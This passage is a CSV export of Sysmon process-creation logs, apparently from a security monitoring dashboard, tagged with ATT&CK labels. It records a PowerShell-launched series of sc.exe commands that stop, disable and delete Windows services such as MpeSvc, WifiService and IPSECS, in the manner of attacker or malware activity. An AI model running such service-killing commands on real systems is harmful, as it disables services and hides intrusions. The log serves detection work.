Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.541890500Z"",""eventRecordID"":""3865"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.537\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-0010c7c63000}\r\nProcessId: 6676\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.537"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-0010c7c63000}"",""processId"":""6676"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.500",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.419 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001031c43000} +ProcessId: 7504 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ALGM +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ALGM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.422637100Z"",""eventRecordID"":""3862"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.419\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001031c43000}\r\nProcessId: 7504\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ALGM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.419"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001031c43000}"",""processId"":""7504"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ALGM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.422",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.333 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-0010a5c13000} +ProcessId: 7732 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) 
+Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WifiService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WifiService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.335676600Z"",""eventRecordID"":""3859"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.333\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-0010a5c13000}\r\nProcessId: 7732\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WifiService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.333"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-0010a5c13000}"",""processId"":""7732"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.396",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:52:36.310 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-0010b5c03000} +ProcessId: 6072 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WifiService Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WifiService Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.313253400Z"",""eventRecordID"":""3858"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.310\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-0010b5c03000}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: 
Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WifiService Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.310"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-0010b5c03000}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WifiService Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.347",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.266 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-0010debe3000} +ProcessId: 5888 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.268466600Z"",""eventRecordID"":""3856"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.266\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-0010debe3000}\r\nProcessId: 5888\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.266"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-0010debe3000}"",""processId"":""5888"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.281",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.181 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001016bc3000} +ProcessId: 5048 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.184515500Z"",""eventRecordID"":""3853"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.181\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001016bc3000}\r\nProcessId: 5048\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:36.181"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001016bc3000}"",""processId"":""5048"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.252",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.118 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001020ba3000} +ProcessId: 6384 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
